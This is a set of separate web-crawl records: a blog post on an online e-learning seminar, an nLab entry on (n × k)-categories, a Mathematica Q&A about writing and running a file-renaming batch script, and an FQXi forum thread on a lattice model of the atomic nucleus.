Warning: what I write now is what I remember of the seminar, so there might be some flaws in the documentation.
The Ikarus Online seminar was organized by three european universities, including one spanish, one I forgot and the university of Saarbrücken, who was main organizer. Participation was free and possible world-wide, so participants came from everywhere in the world. I think a bachelors degree and fluent english was required for participation. Moreover students interested in the seminar had to pass a little entry exam.
The seminar was divided into three partitions: One partition was about studying the social aspects, one partition was about studying the juridicial aspects and one partition was studying the technical aspects of collaborative online e-learning. Goal of the class was to gather material about collaborative e-learning itself and to design in the end a mini-course about collaborative e-learning. I chose to take part in the technical part of the class.
In the end the three partitions were merged.
The platform itself was based on Moodle. It contained several fora, libraries and a chatroom. Participants were also able to communicate via email.
The seminar was working in the following way: students had to study aspects on certain e-learning issues, like in the technical part e.g. compare different existing virtual learning environments, learn about technicalities such as about authentication and authorization, but also about rather “soft skill topics” like about various learning types, and general agreements on a collaborative process, like the always problematic feature of redundancy versus brevity or the question wether to filter key features versus to assemble key features were part of the discussion.
This “soft skill part” was important since e.g. the technical tools for online collaboration are not always appropriate for all thinking types and it is hard to find adaptive measures.
There was a moderated online discussion on these topics and the contributions were graded. There was a multiple choice quizz on the to-be-gathered knowledge concerning the respective learning parts.
After the discussions (one for each topic) students were oblidged to write summaries/little papers about the learned contents in relation to the previous discussion and based on their professional background. These summaries were intended to provide a “course content”. This methodology is by the way similar to the first part in the “scientific method” in that it gathers material in order to justify a hypothesis on online learning paradigma.
After each summary it was decided upon whose summary was the best to function as a guideline for an online course on collaborative online learning.
In the end it turned out that there was quite an overlap between the respective partitions, i.e. questions like the one of authenticfication had of course also be discussed by the juridicial partition, tools like mind maps etc. where likewise discussed in the technical as well in the social part a.s.o.- and it was interesting to compare the different approaches.
Besides the content part of the seminar – at least for me – the social aspects of online collaboration where interesting. In particular I found the communication was extremely polite. There was no sign of flaming wars or any other kind of unrespectful behaviour. This may have been due to the moderators, which guided each discussion, but it also may have been due to the fact that the real life identity of each participant was known to the organizers and that the participants were rather well educated. In the chat room and the “cafe like fora” cultural and interpersonal topics could be discussed which helped to promote collaboration. The time-delay of presentations on the fora helped people to focus on the essentials and to contorl their temper.
It is a pity that the seminars are currently not taking place anymore and that the anonymized course is not accessible at the moment.
### General remarks about online collaboration/conclusion:
I wrote here about several failed attempts to set up an online collaboration.
This is maybe not the best thing to do in order to market a global electronic platform/semantically connected network . However one should be honest. It IS difficult to get such a thing working.
Moreover I learned from these failed attempts. In particular it is crucial that the involved scientists are fairly well motivated to work on a question. This depends to a great extend on the contents of the questions themselves. Like e.g. in the example of climate change/IPCC report, it was clear for all involved scientists that this is an important question to work on. And thus they were motivated enough to go to Paris and write reports.
I.e.
#### an interesting problem is a source of motivation to collaborate.
Likewise this was also the reason why the above mentioned online string seminar didn’t work out, or in other words: there was no central set of questions, everybody would identify with in order to overcome the obstacle of logging in, getting a password and deal with the time-delayed communication. This explains also why people would heatedly discuss about war in the EWM email network, despite the anonymity of an email list – a war is certainly a method to overcome passiveness, albeit an ugly one.
Michael Nielsen lists two other sources of how to set up a good collaboration namely:
#### Collaboration should recognize individual effort appropriately
In the Ikarus seminar this was partially done by the grading, partially by the participants congratulating each other, which I think is important if it is meant true and not fake.
It was by the way used in the German Democratic Republic as a major source of motivation:
“§ 9. Die Staats- und Wirtschaftsfunktionäre sind verantwortlich, die Leistungen der werktätigen Jugend entsprechend dem sozialistischen Leistungsprinzip zu entlohnen, zu prämieren und auf vielfältige Art und Weise moralisch zu würdigen. Sie sichern, daß der Lohn und die Prämie die werktätige :Jugend daran interessieren, hohe Arbeitsleistungen zu vollbringen, höhere Verantwortung zu übernehmen und die erforderliche Qualifikation zu erwerben. (http://www.verfassungen.de/de/ddr/jugendgesetz74.htm (Die Förderung der Initiative der werktätigen Jugend)”
I personally think that the recognition of people one personally respects and estimates highly is probably one of the strongest sources of motivation (especially for collaboration), much stronger than money and power. Money is only really important if the basic needs (food,living,information) need to be decently satisfied. Power is suggesting that there is a lot of recognition, however this is usually only halfway true.
Besides the already mentioned mere interest in a certain matter or mere hunger etc. (for more see http://en.wikipedia.org/wiki/Motivation motivation), the socalled personal believe in “a cause” might be another (often doubtable) source.
The above also displays a bit how much damage can be made if these mechanisms are abused. In the GDR this was unfortunately often the case.
Collaboration should involve people with complementary skills.
Due to the internationality of the string workshop and the EWM network the lack of complementary skills was not really the reason for failure. On the contrary the interests were rather too complimentary. If the interests are too complimentary one needs a great deal of social binding instruments, like e.g. singing together etc. So why not -establish an Online platform chorus?
### 4 Responses to “Ikarus”
1. O. Condor Says:
On the contrary the interests were rather too complimentary.
What do you mean by “too complimentary” ? Do you really think an online chorus helps to resolve problems in string theory?
2. bembo Says:
@operation condor
+1
What do you mean by “too complimentary” ? Do you really think an online chorus helps to resolve problems in string theory?
With “too complimentary” I mean what I described above “there was no central set of questions, everybody would identify with in order to overcome the obstacle of logging in, getting a password and deal with the time-delayed communication. “. That is string theory is a rather big terrain given the necessary detail. Like it comprises a lot of different mathematical models. So I got the impression at the workshop that people were working on rather different models in sufficient detail and so that is was difficult to find something to work on together and that things appeared too far apart for a lot of people. But maybe I am wrong that is I am no string theorist and I have and had giant difficulties to understand the string theory jargon. I don’t know however, how problematic this “jargonization” is among string theorists.
The online chorus comment was more a tongue in cheek comment. I do think that a good working atmosphere is important and in principle social bindings might eventually help to get the extra energy to keep things together and further research, but then this might also increase group stress. Finally the social rituals in some choirs are rather repelling.
In general I think whats more problematic is that apart from maybe their family, researchers have usually all their “social life” within the work community, often alone because the job is so time demanding. When I had no academic job anymore almost all the job acquantainces, with which one would previously hang out -poff- vanished rather instantly.
Here a chart how social life looks like in the US, but I think this probably similar in all “developped” countries.
4. O. Condor Says:
When I had no academic job anymore almost all the job acquantainces, with which one would previously hang out -poff- vanished rather instantly.
Well a job is not thought for enhancing your “social life.” Networking is important for your business (even for research “business) and you shouldn’t confuse networking with relaxation.
Anyways I now understand that what you mean by “too complimentary”, i.e. you mean no overlap, which includes always a little redundancy. I have though doubts that things were like that. I don’t know wether you heard of M-theory which provides a connection to on the first sight disconnected parts.
I am sure the participants were aware of those connections and it was just you as a newcomer who perceived this differently.
But maybe I am wrong that is I am no string theorist and I have and had giant difficulties to understand the string theory jargon.
Considering your communication problems – I think a problem could have been that the knowledge gap was too big. Think about how much your contributions (may have) helped (if there weren’t any at all) and vice versa. May I ask, why you attended this conference?
comments in german, french and russian will be translated into english.
you can use LaTeX in your math comments, by using the $shortcode: [latex] E = m c^2$ | 2018-02-25 03:31:59 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4637569785118103, "perplexity": 1672.2569458241862}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891816094.78/warc/CC-MAIN-20180225031153-20180225051153-00395.warc.gz"} |
https://ncatlab.org/nlab/show/(n%20%C3%97%20k)-category | # nLab (n × k)-category
Contents
### Context
#### Higher category theory
higher category theory
# Contents
## Idea
An $(n \times k)$-category (read “n-by-k category”) is an n-category internal to a $k$-category. The term is “generic” in that it does not specify the level of strictness of the $n$-category and the $k$-category.
For example:
• A $(1 \times 0)$-category, as well as a $(0 \times 1)$-category, is precisely a category. More generally, $(n\times 0)$-categories and $(0\times n)$-categories are precisely $n$-categories.
• A $(1 \times 1)$-category is precisely a double category (either strict or weak).
• Generalizing to a 3rd axis, a $(1 \times 1 \times 1)$-category is precisely a triple category, that is, a category internal to (categories internal to categories), i.e. a catgory internal to double categories, or a double category internal to categories — which again could be strict or weak.
• An $(n \times 1)$-category is what Batanin calls a monoidal n-globular category?.
An $(n \times k)$-category has $(n + 1)(k + 1)$ kinds of cells.
Under suitable fibrancy conditions, a $(n \times k)$-category will have an underlying $(n + k)$-category (where here, $n + k$ is to be read arithmetically, rather than simply as notation). Fibrant $(1 \times 1)$-categories are known as framed bicategories.
## Examples
• Commutative rings, algebras and modules form a symmetric monoidal $(2 \times 1)$-category.
• Conformal nets form a symmetric monoidal $(2 \times 1)$-category.
## Relationships
At least in some cases, if the structure is sufficiently strict or sufficiently fibrant, we can shift cells from $k$ to $n$. For instance:
• A sufficiently strict $(1 \times 2)$-category canonically gives rise to a $(2 \times 1)$-category. (Cor. 3.11 in DH10)
• Any double category (i.e. a $(1\times 1)$-category) has an underlying 2-category.
• A sufficiantly fibrant $(2\times 1)$-category has an underlying tricategory (i.e. $(3\times 0)$-category).
## References
• Mike Shulman, Constructing symmetric monoidal bicategories, arXiv preprint arXiv:1004.0993 (2010)
• Michael Batanin, Monoidal globular categories as a natural environment for the theory of weak $n$-categories , Advances in Mathematics 136 (1998), no. 1, 39–103.
The following paper contains some discussion on the relationship between various (weak) $(n \times k)$-categories for $n, k \leq 3$.
There is some discussion on this n-Category Café post as well as this one.
Last revised on August 12, 2019 at 13:49:36. See the history of this page for a list of all contributions to it. | 2021-10-24 12:10:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 32, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8565487265586853, "perplexity": 1868.9390678365585}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585997.77/warc/CC-MAIN-20211024111905-20211024141905-00047.warc.gz"} |
http://mathematica.stackexchange.com/questions/49226/how-to-output-a-bat-file-and-execute-it | # How to output a bat file and execute it?
I tried to write a bat file which helped me rename files. Command to do this in that file is "ren file1 file2" which is equivalent to RenameFile[file1,file2].
renameFiles[directory_, files_, rename_] :=
Module[{list, i = 1, newfiles},
SetDirectory[directory];
newfiles = ("ren " <> #) & /@ FileNames[files];
list = Table[
" " <> rename <> ToString[i] <> ".png", {i, 1, Length[newfiles]}];
While[i <= Length[newfiles],
newfiles[[i]] = newfiles[[i]] <> list[[i]]; i++];
Return[newfiles]
]
The renameFiles[] has three arguments which take the path, files in that path and name I want to change to respectively, and then convert them into a list "ren file1 file2". Afterwards, I output it as a txt file. I tried to output it as a bat file, however it displays error after I do: Export["E:\\Download Pictures\rename.bat", a]
Therefore, I attempt to do that in a different way, which renames "rename.txt" afterwards by doing: RenameFiles["E:\\Download Pictures\rename.txt","E:\\Download Pictures\rename.bat"]
So, now, I have my "rename.bat" file. I try to use SystemOpen["E:\\Download Pictures\rename.bat"] to execute it. However, it cannot work well, and I have to do it by clicking the file.
My questions are: 1. Sometimes I get the syntax: OpenWrite::noopen: "Cannot open \!$$\"E:\\\\Download Pictures\\\\nename.txt\"$$. " , how can I fix this? 2. Is this the only way I can output a bat file. 3. and, how can I execute via MMA.
Thanks a lot!
-
Not sure why you'd want to go through all the machinations of creating a batch file instead of just doing it directly with RenameFile, but... using your function, e.g.:
rn = renameFiles["c:\\users\\rasher\\documents\\", "*.xxx", "blah"];
Export["c:\\users\\rasher\\documents\\ren.bat", rn, "Text"];
SetDirectory["c:\\users\\rasher\\documents\\"];
Run["ren.bat"]
Will do it.
- | 2015-05-30 08:53:39 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5419070720672607, "perplexity": 4770.185969068668}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1432207930916.2/warc/CC-MAIN-20150521113210-00185-ip-10-180-206-219.ec2.internal.warc.gz"} |
https://fqxi.org/community/forum/topic/1295 | Search FQXi
Please also note that we do not accept unsolicited posts and we cannot review, or open new threads for, unsolicited articles or papers. Requests to review or post such materials will not be answered. If you have your own novel physics theory or model, which you would like to post for further discussion among then FQXi community, then please add them directly to the "Alternative Models of Reality" thread, or to the "Alternative Models of Cosmology" thread. Thank you.
Contests Home
Current Essay Contest
Contest Partners: The Peter and Patricia Gruber Foundation, SubMeta, and Scientific American
Previous Contests
Undecidability, Uncomputability, and Unpredictability Essay Contest
December 24, 2019 - April 24, 2020
Contest Partners: Fetzer Franklin Fund, and The Peter and Patricia Gruber Foundation
What Is “Fundamental”
October 28, 2017 to January 22, 2018
Sponsored by the Fetzer Franklin Fund and The Peter & Patricia Gruber Foundation
Wandering Towards a Goal
How can mindless mathematical laws give rise to aims and intention?
December 2, 2016 to March 3, 2017
Contest Partner: The Peter and Patricia Gruber Fund.
Trick or Truth: The Mysterious Connection Between Physics and Mathematics
Contest Partners: Nanotronics Imaging, The Peter and Patricia Gruber Foundation, and The John Templeton Foundation
Media Partner: Scientific American
How Should Humanity Steer the Future?
January 9, 2014 - August 31, 2014
Contest Partners: Jaan Tallinn, The Peter and Patricia Gruber Foundation, The John Templeton Foundation, and Scientific American
It From Bit or Bit From It
March 25 - June 28, 2013
Contest Partners: The Gruber Foundation, J. Templeton Foundation, and Scientific American
Questioning the Foundations
Which of Our Basic Physical Assumptions Are Wrong?
May 24 - August 31, 2012
Contest Partners: The Peter and Patricia Gruber Foundation, SubMeta, and Scientific American
Is Reality Digital or Analog?
November 2010 - February 2011
Contest Partners: The Peter and Patricia Gruber Foundation and Scientific American
What's Ultimately Possible in Physics?
May - October 2009
Contest Partners: Astrid and Bruce McWilliams
The Nature of Time
August - December 2008
Forum Home
Introduction
Order posts by:
chronological order
most recent first
Posts by the author are highlighted in orange; posts by FQXi Members are highlighted in blue.
RECENT POSTS IN THIS TOPIC
Edwin Klingman: on 10/12/12 at 18:36pm UTC, wrote Dear Norman Cook, In a comment to Rob McEachern you remark that, " I too...
Jarek Duda: on 10/7/12 at 5:42am UTC, wrote Dear Norman, Thank you very much for your supporting comments. I would...
Edwin Klingman: on 10/7/12 at 0:40am UTC, wrote Dear Norman, I was happy to kick you up the list and watch you get into...
Norman Cook: on 10/6/12 at 22:29pm UTC, wrote Dear Jarek, I find your essay to be a very plausible, intuitive way to...
Jarek Duda: on 10/6/12 at 9:39am UTC, wrote Dear Norman, The model I consider brings some new simple intuitions also...
Norman Cook: on 10/5/12 at 22:56pm UTC, wrote Hi Juan, Thanks for the comments. I think the different nucler models...
Norman Cook: on 10/5/12 at 22:25pm UTC, wrote Just one comment on your comment! I remain "agnostic" on most subnucleon...
Norman Cook: on 10/5/12 at 22:17pm UTC, wrote I have enjoyed your essay too. You have packed a lot into 11 pages and we...
RECENT FORUM POSTS
John Cox: "Stefan, thank you for those refs; Occam's Razor would admit a simple..." in Answering Mermin’s...
Georgina Woodward: "Stefan, I may not have spelled out precisely how the additional movement to..." in Answering Mermin’s...
PRASAD DIVATE: "Hi all, I have a comment below! You can travel faster than speed of light..." in Understanding...
Steve Dufourny: "Hello Jim, this time seems a parameter inside this physicality correlated..." in The Nature of Time
Jim Snowdon: "Hi Steve, On the nature of time, we can assume that time exists..." in The Nature of Time
Steve Dufourny: "Hi Prasad, it is a philosophical approach interesting. Like I see you..." in Alternative Models of...
Steve Dufourny: "Hi all, I am occupied here in finland in creating several projects like a..." in Global Collaboration
jim hughes: "We can probably say a lot more about the content of consciousness. But we..." in Understanding...
RECENT ARTICLES
Time to Think
Philosopher Jenann Ismael invokes the thermodynamic arrow of time to explain how human intelligence emerged through culture.
Lockdown Lab Life
Grounded physicists are exploring the use of online and virtual-reality conferencing, and AI-controlled experiments, to maintain social distancing. Post-pandemic, these positive innovations could make science more accessible and environmentally-friendly.
Is Causality Fundamental?
Untangling how the human perception of cause-and-effect might arise from quantum physics, may help us understand the limits and the potential of AI.
Building Agency in the Biology Lab
Physicists are using optogenetics techniques to make a rudimentary agent, from cellular components, which can convert measurements into actions using light.
Think Quantum to Build Better AI
Investigating how quantum memory storage could aid machine learning and how quantum interactions with the environment may have played a role in evolution.
FQXi FORUM
December 3, 2020
CATEGORY: Questioning the Foundations Essay Contest (2012) [back]
TOPIC: Why We Still Don’t Have Quantum Nucleodynamics by Norman D. Cook [refresh]
Author Norman D. Cook wrote on Jun. 25, 2012 @ 15:58 GMT
Essay Abstract
Quantum electrodynamics (QED) is called the "jewel of atomic theory" because it allows for quantitative predictions of a huge number of atomic states using quantum mechanics. Although the QED techniques were adapted to the problems of nuclear theory in the 1950s, they did not lead to a rigorous quantum nucleodynamics (QND). The core problem has been the assumption of a central nuclear potential-well to bind nucleons together, in analogy with the Coulomb force that binds electrons to the nucleus. By replacing that fictitious long-range nuclear potential-well with the experimentally-known, short-range nuclear force, QND becomes possible.
Author Bio
Undergraduate at Princeton University (Princeton, USA), graduate student at Tohoku University (Sendai, Japan) and Oxford University (Oxford, UK), post-doctoral research at Zurich University (Zurich, Switzerland), invited researcher at ATR (Kyoto, Japan), full professor at Department of Informatics, Kansai University (Osaka, Japan). Seventy-plus articles published in refereed science journals, four scientific monographs, most recently, Models of the Atomic Nucleus (Springer, 2010).
Lawrence B. Crowell wrote on Jun. 28, 2012 @ 17:04 GMT
Your paper is pretty interesting, though rather removed from my experience beyond an undergraduate elective course in nuclear physics. At the risk of showing how ignorant I am of nuclear physics, or what might be called classical or pre-QCD nuclear physics, I am going to bounce an idea here. It seems to me that the LDM and the IPM might represent different phases of a nucleus. The two approaches seem to reflect different scales with which the isospin nuclear force acts.
Some years ago emergent supersymmetry was discovered in the physics of the nucleus. It has been my speculation there is some sort of phase transition in the nucleus. This phase transition might be similar to BCS superconductivity, but with a twist. The conductivity of a medium is
σ(ω) = j(ω)E(ω).
The conductivity σ(ω) = Re[σ(ω)] + iIm[σ(ω)] for BCS conductivity the Re[σ(ω)] determines how well a superconductor absorbs photons of frequency σ(ω) for ω > ω_c = 2Δ the photon can demolish a Cooper pair into two uncorrelated electrons. The critical frequency or Δ is determined by a Bogoliubov coefficient. This connects with a phase structure for black holes, or for collective systems that have properties analogous to black holes. The photon entering a black hole has a relationship to a photon exiting the black hole by Bogoliubov coefficients. The black hole may possess a charge, or BPS gauge index, and the incoming photon will interact with the charges on the stretched horizon. For ω > ω_c the photon penetrates the stretched horizon with charged fermions in a correlated or Cooper pair type of state. The wave equation for the vector potential is
(∇^2 - ∂_t^2+ m^2)A^μ = 0,
where the mass is an effective mass m^2 = q|ψ|^2 from the coupling with the fermions ψ. This results in a dispersion relations and a frequency dependent σ(ω), where for ∇^2A^μ = k^2A^μ, where as k --- > 0 the conductivity is
σ(ω) ~ lim_{z--->0}E(ω,z) B(ω,z)
This is analogous to computing the effective the impedance of free space on the boundary of an anti-de Sitter spacetime in the AdS/CFT correspondence. The conductivity is independent of the interchange E < --- > B, where the conductivity is constant for ω = ω(k) < ω_c. The current is the proportional to the potential, from σ(ω) = j(ω)E(ω) constant, the .current
j(ω,k) = const A(ω,k) ~ const ωE(ω,k)
where the current is divergent at ω = 0. This is then a superconducting phase
For AdS_2/CFT_1, the CFT is SL(2, R) or under Euclideanization a representation of an SU(2) isospin gauge theory. This is the nucleon force in a nucleus. The inherent supersymmetry in this correspondence may then be the source for the emergence of supersymmetry in some nuclear states.
Cheers LC
report post as inappropriate
N.D. Cook replied on Jun. 29, 2012 @ 23:34 GMT
Hi Lawrence,
Thanks for the comments. The topic of the “phase” of nuclear matter is complex (the gas-to-liquid transition has been studied mainly in the framework of high-energy multifragmentation, see “Statistical Models for Nuclear Decay“ A.J. Cole, IOP, Bristol, 2000, for discussion). Although the identity of the solid-phase and gaseous-phase IPM description of nuclei has motivated by own research, whichever “phase” is assumed, the surprising finding from the 1990s is that nuclei exist in well-defined IPM states only 75-80% of the time (Pandharipandhe, Rev. Mod. Phys. 69, 981, 1997), with the remaining percentage being “transition” states. John Wheeler and Niels Bohr both commented that the LARGE nuclei have many characteristics of solids, but, from the perspective of the lattice representation of the IPM, it appears that the 20%-25% of non-IPM states might be due to the fluid movement of nucleons between lattice sites on the nuclear surface... a liquid-like “skin” around a lattice core. The emergence of “supersymmetry” might be more evident in the lattice than in the liquid….
Cheers
Norman
report post as inappropriate
Lawrence B. Crowell replied on Jun. 30, 2012 @ 14:04 GMT
The AdS/CFT analogues appear to hold for some solid state physics systems with heavy metals. This leads to superconductor behaviors and is thought to be a case of how high temperature superconductivity physics occurs. I would tend to agree that if this happens with nuclei this happens in the lattice phase. If I understand properly the liquid drop model pertains to highly excited nuclei, which is a case where the nucleus has been excited into a “melt.” At much higher energy I presume one could say the nucleus is vaporized into a scattering of protons and neutrons. There was some work at the tevatron along those lines. There are though some heavy ion work and experiments with HRIC and now the heavy ion work at the LHC which is searching for black hole.AdS like behavior in quark-gluon plasmas. This would then represent a more extreme case; a case where the nucleus is replaced with a QCD-lattice of quark-gluon physics.
Cheers LC
report post as inappropriate
Lawrence B. Crowell replied on Jul. 10, 2012 @ 17:59 GMT
I guess your references are not on the arXiv. I will try to look them up in library copies. I have been a bit slow, for one of my brothers died recently and I have been involved with that.
Cheers LC
report post as inappropriate
Alan Kadin wrote on Jul. 2, 2012 @ 12:50 GMT
Dr. Cook:
Your excellent essay presents a clear example of the fallacy of non-unique explanations, where a conventional picture is assumed to explain a set of results, even though an alternative picture may reproduce the same results with greater logical consistency. Unfortunately, this fallacy is quite prevalent through science, and indeed all human endeavors. You might also be interested in my own essay (The Rise and Fall of Wave-Particle Duality), where I point out that neutron diffraction from a crystal does NOT uniquely prove that the neutron is a de Broglie wave. The same diffraction results follow for a small-particle neutron scattering from a lattice with quantized momentum transfer.
Alan Kadin, Princeton Junction, NJ, USA
report post as inappropriate
N.D. Cook replied on Jul. 3, 2012 @ 04:41 GMT
Hi Alan,
Thanks for the comments. I will respond to your essay elsewhere, but want to follow up on our common concerns here.
In connecting the dots to form a picture (whether ink dots on paper or data points in our minds), everyone is guided by tacit assumptions about what the final picture should look like. Once the picture has been drawn and made explicit, however, it is hard “not to see” the final product in the mind’s eye – and nearly every new data point will act only to reinforce that view. The “bias for the familiar” is a plague on all scientific endeavor and means that, especially for those of us trying to rethink fundamental physics, we need to offer more than “alternative” views. Alternatives are necessarily less familiar… and consequently suspect! Fair or unfair, we need to do two more things: (1) show how our alternatives are indeed improvements, and (2) show how the historical context led earlier researchers to their (we believe, mistaken) views. The first is simply the development of the new idea itself (and is fun and creative work), but the second is the more arduous task of understanding the ideas of others.
Cheers
Norman
report post as inappropriate
Vladimir F. Tamari wrote on Jul. 3, 2012 @ 09:29 GMT
Congratulations Norman - your many years of hard and original work on the problem of nuclear structure are gradually bearing fruit as more and more people read and respond to your approach. I am particularly grateful to you for stressing the FCC (face-centered-cubic) lattice as the one Nature prefers. As you know I have adopted it in my own theory (of everything - or nothing - i.e. in the vacuum ;). There is something exquisitely beautiful about the diamond-like arrangements of nucleons - shown in the illustrations of your essay. Dirac would have admired your work - he was moved by beauty in physics as this 1970's interview shows.
report post as inappropriate
Norman D. Cook replied on Jul. 7, 2012 @ 03:57 GMT
I think we share a sense of what is beautiful, but I am repeatedly reminded of the truth that beauty is in the eye of the beholder. So, you and I see beauty in lattice symmetries, while others see greater beauty in the act of experimental verification. The Higgs boson is a good example, but I would say that the collective effort that led to that result is more beautiful than the result itself. In any case, the FQXi essays are good examples of different levels of conceptualization, where we stake out our individual claims of “local” beauty. (Meanwhile, we await your essay…)
report post as inappropriate
Vladimir F. Tamari replied on Jul. 7, 2012 @ 13:36 GMT
Hi Norman Indeed we are blessed to have this openness to beauty in general,and to enjoy Japanese gardens and sense of design and harmony. But the sort of beauty in physics goes beyond just the lovely illustrations - it is in the knowledge of the logic, economy and sheer intelligence in the workings of nature. Of course some may object and say that we impose this sense of order on nature with our theories and ideas, but I think we as natural organisms have evolved in much the same way as atoms and molecules did - and share the same logic!
I just submitted my colorful FQXI essay today it was harder to pare it down to the required length than just writing it!
Cheers!
report post as inappropriate
Vijay Mohan Gupta wrote on Jul. 4, 2012 @ 23:15 GMT
It is a very interesting essay. I reproduce the text from abstract that interests me.
"The core problem has been the assumption of a central nuclear potential-well to bind nucleons together, in analogy with the Coulomb force that binds electrons to the nucleus. "
I believe the problem is still more fundamental and originates from concept of conservation as applied to energy (with neutralization) while no negative mass or energy particles have been found till to-date. If neutralization is extracted out of conservation, Konservation is left behind. (See upcoming essay on 5-Dimensional Universe)With this, potential well cease to have meaning for confinement.
Elsewhere, I have commented with particle model from PicoPhysics describing particle as a collective set of photons. It is bound together by difference in relaxation time characteristic of particle with affected space surrounding the particle.
Picophysics view of stability has two predominant affect;
1. Space surrounding the particle has an affect on particle stability. This results in different cross-sections for interaction with other particles.
2. Result in specific energy level of emitted radiations
3. Nuclear Magic numbers
However, the nuclear dimension of PicoPhysics will be presented at level -4. Only level-1 is publicly available www.picophysics.org
report post as inappropriate
Norman D. Cook replied on Jul. 7, 2012 @ 03:57 GMT
Hi Vijay,
Thanks for the comments. The “central” nuclear potential well has been a source of problems in nuclear structure theory for many decades, so it will be of interest to see if your picophysics can account for experimental facts without that fiction. The magic numbers are important, but their empirical identification is a particularly slippery issue because the “magicness” of proton magic numbers is influenced by the number of neutrons, and vice versa. That is why the textbooks sometimes include 6, 14, 28, 40 and 70 as magic or “semi-magic,” and modern studies on exotic nuclei with huge excesses of protons or neutrons sometimes report the “disappearance” of other magic numbers. The QM “texture” of nuclei is certain (e.g., my Table 2), but the evaluation of “closed” shells is trickier than the evaluation of the inertness of the inert gases in atomic theory.
report post as inappropriate
Edwin Eugene Klingman wrote on Jul. 6, 2012 @ 02:24 GMT
Dear Norman Cook,
I think you have another winning essay. You clearly state the issue: "The core problem has been the assumption of a central nuclear potential well to bind nucleons together..."
Since Quantum Chromodynamics is unable to calculate spin and other form factors for the nucleons, and predicted a 'quark gas' instead of the 'perfect fluid' found when heavy ions collide, it is probably not too surprising that the 'nucleon gas' perspective also fails.
What is surprising is that gaseous independent particle model (IPM) mimics the symmetries of the lattice such that "to know the quantum mechanical structure of the nucleus... is to know its lattice structure and vice versa." I was somewhat confused about the meaning of angular momentum quantum number until I found that it's based on the distance from the nuclear spin axis (as I had guessed it must be).
You may recall from my earlier essay and "Chromodynamics War" that my model of nucleons is based on a self-sustained flux tube that provides a pseudo-lattice structure based on nearest-neighbor interactions (at least through the alpha particle and potentially higher). My current essay The Nature of the Wave Function is based on the same field but is focused on the quantum mechanical wave function of free particles and atomic electrons. I have not applied it to the nucleus. As you mention the "many debates concerning the interpretation of quantum mechanics", I hope that you find the opportunity to read my essay, and I very much look forward to your comments.
I also found it helpful to read your 2010 monograph and suggest other interested readers do so. Finally, this essay and monograph and your previous essay have inspired me to buy your book on "Models of the Atomic Nucleus". In short, you have convinced me.
Congratulations again on an excellent essay which seems to unarguably challenge a key assumption of the last century.
Edwin Eugene Klingman
report post as inappropriate
Norman D. Cook wrote on Jul. 7, 2012 @ 03:56 GMT
Hi Edwin,
I too am a fan of your work (and will comment under your essay later) – and especially your book, The Chromodynamics War. The only reason it didn’t make the New York Times best-seller list is that it is relentlessly high-brow, but I think you have identified – and spun an interesting story about – a hugely important conceptual divide between those who value causal coherency versus those who seem to value Standard Model categorization (even when causal coherency is uncertain). In the context of nuclear structure theory, the various nuclear models can account separately for different data sets, but the necessity of jumping from one model to another is jarring for anyone who values coherency… and makes me think there are different understandings of what “understanding” means.
report post as inappropriate
M. Asghar wrote on Jul. 11, 2012 @ 07:37 GMT
Dr. Cook,
I have gone through your thought-provoking paper dealing with "the core problem has been the assumption of a central nuclear potential-well to bind nucleons together, in analogy with the Coulomb force that binds electrons to the nucleus.”
It is true that the central attractive nuclear Coulomb force compels the atomic electrons to orbit around the nucleus, but this is not...
view entire post
report post as inappropriate
Norman D. Cook replied on Jul. 11, 2012 @ 10:47 GMT
Professor Asghar,
Many thanks for commenting in such detail (here and elsewhere). Despite obvious differences in perspective, I am not sure how mutually-exclusive our views are. Specifically, I would agree with you that the shell model’s description of “independent” nucleon states is “unassailable”. But the theoretical contortions that are needed to get to that description in a...
view entire post
report post as inappropriate
Edwin Eugene Klingman replied on Jul. 11, 2012 @ 21:33 GMT
Dear Professors Cook and Ashgar,
